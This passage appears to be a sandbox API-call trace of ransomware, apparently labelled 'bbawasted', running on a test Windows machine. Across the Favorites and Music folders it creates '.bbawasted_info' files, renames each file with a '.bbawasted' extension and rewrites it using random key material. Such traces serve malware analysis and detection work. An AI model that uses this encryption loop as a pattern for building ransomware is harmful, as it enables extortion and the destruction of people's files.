lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.964] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0072.964] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.965] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0072.965] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.965] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.966] SetEndOfFile (hFile=0x120) returned 1 [0072.967] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.967] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0072.967] lstrcpyW (in: lpString1=0x5bf0f0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.bbawasted")) returned 1 [0072.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.967] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0072.968] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x85 [0072.968] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x570000 [0072.968] CloseHandle (hObject=0x110) returned 1 [0072.970] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.971] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.971] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.971] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.971] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.972] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.980] SetEndOfFile (hFile=0x120) returned 1 [0072.982] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0072.982] CloseHandle (hObject=0x120) returned 1 [0072.984] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0072.984] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d3060 | out: hHeap=0x580000) returned 1 [0072.984] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0072.985] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0072.985] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.985] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0072.985] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x298) returned 0x5bf070 [0072.985] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.985] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0072.985] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0072.985] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0072.985] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0072.986] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0072.987] SetEndOfFile (hFile=0x120) returned 1 [0072.987] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.987] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0072.987] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.bbawasted")) returned 1 [0072.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0072.989] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0072.989] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x85 [0072.989] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x570000 [0072.989] CloseHandle (hObject=0x11c) returned 1 [0072.991] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0072.991] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.992] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.992] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0072.992] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0072.992] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.001] SetEndOfFile (hFile=0x120) returned 1 [0073.003] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.003] CloseHandle (hObject=0x120) returned 1 [0073.004] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0073.005] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cb8a8 | out: hHeap=0x580000) returned 1 [0073.005] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.005] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.005] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0073.005] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a4) returned 0x5bf070 [0073.006] lstrcpyW (in: lpString1=0x5bf10a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.006] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0073.006] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.006] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0073.006] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.017] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.018] SetEndOfFile (hFile=0x120) returned 1 [0073.018] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.019] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.019] lstrcpyW (in: lpString1=0x5bf10a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.bbawasted")) returned 1 [0073.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0073.058] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0073.058] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x85 [0073.058] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x570000 [0073.058] CloseHandle (hObject=0x110) returned 1 [0073.060] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.060] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.060] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.060] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.061] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.061] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.069] SetEndOfFile (hFile=0x120) returned 1 [0073.071] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.071] CloseHandle (hObject=0x120) returned 1 [0073.123] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0073.124] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5cc908 | out: hHeap=0x580000) returned 1 [0073.124] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.125] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.125] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.125] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0Ur9IACO8w6y.wav") returned 56 [0073.125] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27a) returned 0x5d0700 [0073.125] lstrcpyW (in: lpString1=0x5d0770, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.125] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0073.125] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.125] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0073.125] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0Ur9IACO8w6y.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0ur9iaco8w6y.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.126] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.127] SetEndOfFile (hFile=0x120) returned 1 [0073.127] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.127] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.127] lstrcpyW (in: lpString1=0x5d0770, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0Ur9IACO8w6y.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0ur9iaco8w6y.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0Ur9IACO8w6y.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0ur9iaco8w6y.wav.bbawasted")) returned 1 [0073.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\0Ur9IACO8w6y.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\0ur9iaco8w6y.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.128] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0073.128] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xf441 [0073.128] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf441) returned 0x570000 [0073.128] CloseHandle (hObject=0x11c) returned 1 [0073.132] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.132] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.133] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.133] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.133] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.133] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.142] SetEndOfFile (hFile=0x120) returned 1 [0073.144] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.144] CloseHandle (hObject=0x120) returned 1 [0073.145] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0073.145] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d10f8 | out: hHeap=0x580000) returned 1 [0073.146] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.146] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.146] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.146] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1RGLUJGfslsUhOozLs98.m4a") returned 64 [0073.146] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28a) returned 0x5bf070 [0073.146] lstrcpyW (in: lpString1=0x5bf0f0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.146] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0073.147] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.147] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0073.147] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1RGLUJGfslsUhOozLs98.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1rglujgfslsuhoozls98.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.148] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.149] SetEndOfFile (hFile=0x120) returned 1 [0073.149] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.149] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.149] lstrcpyW (in: lpString1=0x5bf0f0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.149] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1RGLUJGfslsUhOozLs98.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1rglujgfslsuhoozls98.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1RGLUJGfslsUhOozLs98.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1rglujgfslsuhoozls98.m4a.bbawasted")) returned 1 [0073.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1RGLUJGfslsUhOozLs98.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1rglujgfslsuhoozls98.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0073.150] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0073.150] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x790 [0073.150] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x570000 [0073.150] CloseHandle (hObject=0x110) returned 1 [0073.195] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.195] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.195] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.195] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.196] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.196] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.205] SetEndOfFile (hFile=0x120) returned 1 [0073.207] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.207] CloseHandle (hObject=0x120) returned 1 [0073.211] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0073.211] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d3140 | out: hHeap=0x580000) returned 1 [0073.212] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.212] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.212] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dAOUSz.mp3") returned 50 [0073.212] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x26e) returned 0x5d0700 [0073.213] lstrcpyW (in: lpString1=0x5d0764, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.213] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.213] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.213] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.213] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.213] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dAOUSz.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\daousz.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.214] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.215] SetEndOfFile (hFile=0x120) returned 1 [0073.215] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) 